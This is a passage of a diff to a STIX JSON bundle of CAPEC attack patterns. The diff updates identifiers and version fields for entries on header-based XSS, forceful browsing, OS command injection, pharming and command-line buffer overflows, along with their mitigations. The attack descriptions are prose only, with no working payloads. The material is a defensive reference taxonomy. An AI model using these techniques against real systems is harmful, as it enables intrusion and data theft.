"relationship_type": "mitigates", - "target_ref": "attack-pattern--3b1752b9-6701-4d0d-8733-c9226ab8c0a3" + "target_ref": "attack-pattern--5d250b2b-1f3f-4a41-9cbf-7c91fb7e4c69" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--291cf7c8-cbb9-4d9d-b4dd-0ae3a2a0e24b", - "source_ref": "course-of-action--c4397106-6835-4ce6-b6e4-80a636d6f5a8", + "id": "relationship--06918c00-aa82-45c3-9c95-b649ae753370", + "source_ref": "course-of-action--116eb05d-d01e-415d-b3d1-7d05b9b2d526", "relationship_type": "mitigates", - "target_ref": "attack-pattern--3b1752b9-6701-4d0d-8733-c9226ab8c0a3" + "target_ref": "attack-pattern--5d250b2b-1f3f-4a41-9cbf-7c91fb7e4c69" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--5834c687-e4a9-4806-8887-c94d79dec6b3", - "source_ref": "course-of-action--4bdc152c-7111-4d9d-872a-6c9579ddb87c", + "id": "relationship--b8735d4a-9ef5-4d8b-92ec-ee3b9b0f2cfc", + "source_ref": "course-of-action--a78dc251-20b0-40ba-8c69-a48e4dc81eb5", "relationship_type": "mitigates", - "target_ref": "attack-pattern--3b1752b9-6701-4d0d-8733-c9226ab8c0a3" + "target_ref": "attack-pattern--5d250b2b-1f3f-4a41-9cbf-7c91fb7e4c69" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--d7bdf7b2-603c-4c06-9cee-8f0c12255862", - "source_ref": "course-of-action--29cc8977-ef47-4c16-a4d2-92483b2e34ec", + "id": "relationship--c72d1e60-6f64-45ad-9ac1-bf091aeb1325", + "source_ref": "course-of-action--fe2064cc-6c8a-4d9b-87e8-5f0491194111", "relationship_type": "mitigates", - "target_ref": "attack-pattern--3b1752b9-6701-4d0d-8733-c9226ab8c0a3" + "target_ref": "attack-pattern--5d250b2b-1f3f-4a41-9cbf-7c91fb7e4c69" }, { "name": "XSS Through HTTP Headers", "description": "An adversary exploits web applications that generate web content, such as links in a HTML page, based on unvalidated or improperly validated data submitted by other actors. XSS in HTTP Headers attacks target the HTTP headers which are hidden from most users and may not be validated by web applications.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", @@ -44393,132 +45113,133 @@ "XSS can be used in variety of ways, because it is scripted and executes in a distributed, asynchronous fashion it can create its own vector and openings. For example, the attacker can use XSS to mount a DDoS attack by having series of different computers unknowingly executing requests against a single host." ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--5e86fd08-94bb-41d9-92f2-197b294c29c9" + "id": "attack-pattern--ef49301f-4b17-4c00-89f7-f2f06f9af9c1" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--c93d7b8d-d65a-4d44-8c39-db5ee76b0b51", - "source_ref": "course-of-action--d8c851f4-9464-4d22-b6a5-8e817e3754d1", + "id": "relationship--00b2d802-87bd-4e59-9395-772602c5945b", + "source_ref": "course-of-action--301e5bbb-d0b4-4c64-93b0-d83f7a317420", "relationship_type": "mitigates", - "target_ref": "attack-pattern--5e86fd08-94bb-41d9-92f2-197b294c29c9" + "target_ref": "attack-pattern--ef49301f-4b17-4c00-89f7-f2f06f9af9c1" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--cadadeac-4b56-4285-acf1-92086e0cd14a", - "source_ref": "course-of-action--a837738e-a076-4304-b906-9664bc087b5e", + "id": "relationship--f5c0ea9b-986b-4c21-8bad-07b3b2877a81", + "source_ref": "course-of-action--f574f5d2-f432-454c-b6f1-15e34c1c479d", "relationship_type": "mitigates", - "target_ref": "attack-pattern--5e86fd08-94bb-41d9-92f2-197b294c29c9" + "target_ref": "attack-pattern--ef49301f-4b17-4c00-89f7-f2f06f9af9c1" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--a33d86f3-6bcc-4ebb-b668-904495e90161", - "source_ref": "course-of-action--12459e09-4b33-44c1-9449-b1d67b30214f", + "id": "relationship--41ee0f19-8e89-40ba-bca9-71f8260e549b", + "source_ref": "course-of-action--a9cece7b-a84a-4af1-8e06-3f188167a17c", "relationship_type": "mitigates", - "target_ref": "attack-pattern--5e86fd08-94bb-41d9-92f2-197b294c29c9" + "target_ref": "attack-pattern--ef49301f-4b17-4c00-89f7-f2f06f9af9c1" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--3e62c4f3-c897-4800-9d0d-e5f196e5b182", - "source_ref": "course-of-action--f3bd3d55-f25e-4bff-b92b-5a1b421a1975", + "id": "relationship--6320ea75-da4c-4cfc-b6b1-adbdfedbd0af", + "source_ref": "course-of-action--5ab5bb92-9b0c-4d06-a27f-392c82b316c5", "relationship_type": "mitigates", - "target_ref": "attack-pattern--5e86fd08-94bb-41d9-92f2-197b294c29c9" + "target_ref": "attack-pattern--ef49301f-4b17-4c00-89f7-f2f06f9af9c1" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--62fba7cb-b1bd-4b8e-a7bc-b73631f277e3", - "source_ref": "course-of-action--973c207c-2784-4f0c-98e8-0ac062857549", + "id": "relationship--19a97228-07cd-41cf-9b77-4d3003b74062", + "source_ref": "course-of-action--a96d9ccc-8454-4b63-853f-1cfd142e970c", "relationship_type": "mitigates", - "target_ref": "attack-pattern--5e86fd08-94bb-41d9-92f2-197b294c29c9" + "target_ref": "attack-pattern--ef49301f-4b17-4c00-89f7-f2f06f9af9c1" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--be2b7718-5e8e-4803-841b-801511ebbb6c", - "source_ref": "course-of-action--c4397106-6835-4ce6-b6e4-80a636d6f5a8", + "id": "relationship--f2bbfee3-f2c6-498e-a90f-ab054df7d912", + "source_ref": "course-of-action--116eb05d-d01e-415d-b3d1-7d05b9b2d526", "relationship_type": "mitigates", - "target_ref": "attack-pattern--5e86fd08-94bb-41d9-92f2-197b294c29c9" + "target_ref": "attack-pattern--ef49301f-4b17-4c00-89f7-f2f06f9af9c1" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--b8ed0b4c-0c04-4e74-9d6a-72946b835801", - "source_ref": "course-of-action--4bdc152c-7111-4d9d-872a-6c9579ddb87c", + "id": "relationship--8cd24df9-fbbc-45e6-9090-777c7bae0516", + "source_ref": "course-of-action--a78dc251-20b0-40ba-8c69-a48e4dc81eb5", "relationship_type": "mitigates", - "target_ref": "attack-pattern--5e86fd08-94bb-41d9-92f2-197b294c29c9" + "target_ref": "attack-pattern--ef49301f-4b17-4c00-89f7-f2f06f9af9c1" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--b8d63255-447a-450b-8f72-0834c7da4b3f", - "source_ref": "course-of-action--0b964038-37af-42a2-a349-07fe08c6d613", + "id": "relationship--d33fd327-13cb-4adc-b807-9ff679445dad", + "source_ref": "course-of-action--9e10d99c-ac01-427e-aee4-2df1aa87286a", "relationship_type": "mitigates", - "target_ref": "attack-pattern--5e86fd08-94bb-41d9-92f2-197b294c29c9" + "target_ref": "attack-pattern--ef49301f-4b17-4c00-89f7-f2f06f9af9c1" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--9dc4bae5-a3a5-4f35-8607-04dacde42e6d", - "source_ref": "course-of-action--29cc8977-ef47-4c16-a4d2-92483b2e34ec", + "id": "relationship--4c88411e-75aa-4bcd-9c3f-59ffa93bd362", + "source_ref": "course-of-action--fe2064cc-6c8a-4d9b-87e8-5f0491194111", "relationship_type": "mitigates", - "target_ref": "attack-pattern--5e86fd08-94bb-41d9-92f2-197b294c29c9" + "target_ref": "attack-pattern--ef49301f-4b17-4c00-89f7-f2f06f9af9c1" }, { "name": "Forceful Browsing", "description": "An attacker employs forceful browsing to access portions of a website that are otherwise unreachable through direct URL entry. Usually, a front controller or similar design pattern is employed to protect access to portions of a web application. Forceful browsing enables an attacker to access information, perform privileged operations and otherwise reach sections of the web application that have been improperly protected.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", @@ -44572,65 +45293,66 @@ "\n A bulletin board application provides an administrative interface at admin.aspx when the user logging in belongs to the administrators group.\n An attacker can access the admin.aspx interface by making a direct request to the page. Not having access to the interface appropriately protected allows the attacker to perform administrative functions without having to authenticate himself in that role.\n " ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--b535775a-207a-4cac-a703-52bd51947922" + "id": "attack-pattern--738f95bd-2885-4cb4-a782-d1a58198d726" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-87-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Authenticate request to every resource. In addition, every page or resource must ensure that the request it is handling has been made in an authorized context.", "type": "course-of-action", - "id": "course-of-action--945b3d11-2279-42bc-94b5-cb549ad2233b" + "id": "course-of-action--7f7e04ce-16c7-4477-b567-098e8708dd0b" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--e2af9c69-6b9a-41f6-87c1-abf6bab0107e", - "source_ref": "course-of-action--945b3d11-2279-42bc-94b5-cb549ad2233b", + "id": "relationship--8f47f09d-2b56-4f15-b305-6b27f49fbc94", + "source_ref": "course-of-action--7f7e04ce-16c7-4477-b567-098e8708dd0b", "relationship_type": "mitigates", - "target_ref": "attack-pattern--b535775a-207a-4cac-a703-52bd51947922" + "target_ref": "attack-pattern--738f95bd-2885-4cb4-a782-d1a58198d726" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-87-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Forceful browsing can also be made difficult to a large extent by not hard-coding names of application pages or resources. This way, the attacker cannot figure out, from the application alone, the resources available from the present context.", "type": "course-of-action", - "id": "course-of-action--78882d20-5060-4afe-95f0-e68f6c5b7c52" + "id": "course-of-action--2cdc30fb-468f-460e-995b-1f0e1827dc75" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--d18653de-aba1-42d3-9711-d8c32a6237ed", - "source_ref": "course-of-action--78882d20-5060-4afe-95f0-e68f6c5b7c52", + "id": "relationship--ab4e9f7b-ce52-40e6-b090-746b9e36a5db", + "source_ref": "course-of-action--2cdc30fb-468f-460e-995b-1f0e1827dc75", "relationship_type": "mitigates", - "target_ref": "attack-pattern--b535775a-207a-4cac-a703-52bd51947922" + "target_ref": "attack-pattern--738f95bd-2885-4cb4-a782-d1a58198d726" }, { "name": "OS Command Injection", "description": "In this type of an attack, an adversary injects operating system commands into existing application functions. An application that uses untrusted input to build command strings is vulnerable. An adversary can leverage OS command injection in an application to elevate privileges, execute arbitrary commands and compromise the underlying operating system.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2014-06-23T00:00:00.000Z", @@ -44707,90 +45429,91 @@ "\n A transaction processing system relies on code written in a number of languages. To access this functionality, the system passes transaction information on the system command line.\n An attacker can gain access to the system command line and execute malicious commands by injecting these commands in the transaction data. If successful, the attacker can steal information, install backdoors and perform other nefarious activities that can compromise the system and its data.See also: A vulnerability in Mozilla Firefox 1.x browser allows an attacker to execute arbitrary commands on the UNIX/Linux operating system. The vulnerability is caused due to the shell script used to launch Firefox parsing shell commands that are enclosed within back-ticks in the URL provided via the command line. This can be exploited to execute arbitrary shell commands by tricking a user into following a malicious link in an external application which uses Firefox as the default browser (e.g. the mail client Evolution on Red Hat Enterprise Linux 4)." ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--252cb5cf-6382-412c-a29f-169753f408b2" + "id": "attack-pattern--3633a1c0-2af2-4343-b504-4e69c76db60e" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2014-06-23T00:00:00.000Z", "name": "coa-88-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Use language APIs rather than relying on passing data to the operating system shell or command line. Doing so ensures that the available protection mechanisms in the language are intact and applicable.", "type": "course-of-action", - "id": "course-of-action--f4702cca-ae5a-440d-8d11-b23dff2931bc" + "id": "course-of-action--12dd252e-6383-44c6-a23a-94f0d18dd77a" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2014-06-23T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--7231babc-0fb3-417f-8785-a12c0d0b64ff", - "source_ref": "course-of-action--f4702cca-ae5a-440d-8d11-b23dff2931bc", + "id": "relationship--b8feb49d-0da7-4086-9ff4-922eda80d0d1", + "source_ref": "course-of-action--12dd252e-6383-44c6-a23a-94f0d18dd77a", "relationship_type": "mitigates", - "target_ref": "attack-pattern--252cb5cf-6382-412c-a29f-169753f408b2" + "target_ref": "attack-pattern--3633a1c0-2af2-4343-b504-4e69c76db60e" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2014-06-23T00:00:00.000Z", "name": "coa-88-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Filter all incoming data to escape or remove characters or strings that can be potentially misinterpreted as operating system or shell commands", "type": "course-of-action", - "id": "course-of-action--80c1e9ad-f5a4-4ee5-a3af-c2418a80a427" + "id": "course-of-action--c473eff9-1c98-4dba-9d3e-16a2ea9ac567" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2014-06-23T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--0a5f81d0-f4e9-4b41-8dcc-061356eaa765", - "source_ref": "course-of-action--80c1e9ad-f5a4-4ee5-a3af-c2418a80a427", + "id": "relationship--dd9e8510-5611-4488-84bd-6bdc3ac13dfe", + "source_ref": "course-of-action--c473eff9-1c98-4dba-9d3e-16a2ea9ac567", "relationship_type": "mitigates", - "target_ref": "attack-pattern--252cb5cf-6382-412c-a29f-169753f408b2" + "target_ref": "attack-pattern--3633a1c0-2af2-4343-b504-4e69c76db60e" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2014-06-23T00:00:00.000Z", "name": "coa-88-2", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "All application processes should be run with the minimal privileges required. Also, processes must shed privileges as soon as they no longer require them.", "type": "course-of-action", - "id": "course-of-action--daa75fbc-1fcc-4917-91f8-8fe599f78cd6" + "id": "course-of-action--9e6a4c57-5807-4163-b637-6a4aeabc542d" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2014-06-23T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--38a1d08d-210c-432b-b104-ee52923b4c0c", - "source_ref": "course-of-action--daa75fbc-1fcc-4917-91f8-8fe599f78cd6", + "id": "relationship--e18da919-cf74-4285-8858-382596037a0b", + "source_ref": "course-of-action--9e6a4c57-5807-4163-b637-6a4aeabc542d", "relationship_type": "mitigates", - "target_ref": "attack-pattern--252cb5cf-6382-412c-a29f-169753f408b2" + "target_ref": "attack-pattern--3633a1c0-2af2-4343-b504-4e69c76db60e" }, { "name": "Pharming", "description": "A pharming attack occurs when the victim is fooled into entering sensitive data into supposedly trusted locations, such as an online bank site or a trading platform. An attacker can impersonate these supposedly trusted sites and have the victim be directed to his site rather than the originally intended one. Pharming does not require script injection or clicking on malicious links for the attack to succeed.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", @@ -44833,90 +45556,91 @@ "\n An online bank website requires users to provide their customer ID and password to log on, but does not use a secure connection.\n An attacker can setup a similar fake site and leverage pharming to collect this information from unknowing victims.\n " ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--a493c45e-6b77-491a-9653-8268e657fc26" + "id": "attack-pattern--66a47ab4-8af8-4181-a318-6b7a6c979201" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-89-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "All sensitive information must be handled over a secure connection.", "type": "course-of-action", - "id": "course-of-action--1d536c15-cc83-459f-ae57-e4e540167d1b" + "id": "course-of-action--16ed8c75-c48b-47c3-9786-2402110e60c0" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--068ab8b7-a9ca-4c70-a78a-a8a65adbfb81", - "source_ref": "course-of-action--1d536c15-cc83-459f-ae57-e4e540167d1b", + "id": "relationship--fb7a7520-3f18-4bee-b0cd-8e8bd6589311", + "source_ref": "course-of-action--16ed8c75-c48b-47c3-9786-2402110e60c0", "relationship_type": "mitigates", - "target_ref": "attack-pattern--a493c45e-6b77-491a-9653-8268e657fc26" + "target_ref": "attack-pattern--66a47ab4-8af8-4181-a318-6b7a6c979201" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-89-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Known vulnerabilities in DNS or router software or in operating systems must be patched as soon as a fix has been released and tested.", "type": "course-of-action", - "id": "course-of-action--2293dac0-2f34-4fda-b56e-d4e9c91741b5" + "id": "course-of-action--d4ef596f-7bd1-4d5c-9603-210276b30b41" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--062e6c55-682a-4941-b4b7-3cf55892bb8b", - "source_ref": "course-of-action--2293dac0-2f34-4fda-b56e-d4e9c91741b5", + "id": "relationship--1048b2ed-809f-4b9b-903a-d08691dc1f76", + "source_ref": "course-of-action--d4ef596f-7bd1-4d5c-9603-210276b30b41", "relationship_type": "mitigates", - "target_ref": "attack-pattern--a493c45e-6b77-491a-9653-8268e657fc26" + "target_ref": "attack-pattern--66a47ab4-8af8-4181-a318-6b7a6c979201" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-89-2", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "End users must ensure that they provide sensitive information only to websites that they trust, over a secure connection with a valid certificate issued by a well-known certificate authority.", "type": "course-of-action", - "id": "course-of-action--6264cc67-c1e5-4f41-ac03-03419f91ef12" + "id": "course-of-action--b076c653-73bb-4d42-a528-7e98b74ae691" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--244e1bc8-d946-4493-9ce0-a3f8ef2e81f4", - "source_ref": "course-of-action--6264cc67-c1e5-4f41-ac03-03419f91ef12", + "id": "relationship--6121b719-1dbf-44cb-b2a7-70d531a099de", + "source_ref": "course-of-action--b076c653-73bb-4d42-a528-7e98b74ae691", "relationship_type": "mitigates", - "target_ref": "attack-pattern--a493c45e-6b77-491a-9653-8268e657fc26" + "target_ref": "attack-pattern--66a47ab4-8af8-4181-a318-6b7a6c979201" }, { "name": "Buffer Overflow in Local Command-Line Utilities", "description": "This attack targets command-line utilities available in a number of shells. An attacker can leverage a vulnerability found in a command-line utility to escalate privilege to root.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", @@ -45008,145 +45732,146 @@ "\n \n Attack Example: HPUX passwd\n A buffer overflow in the HPUX passwd command allows local users to gain root privileges via 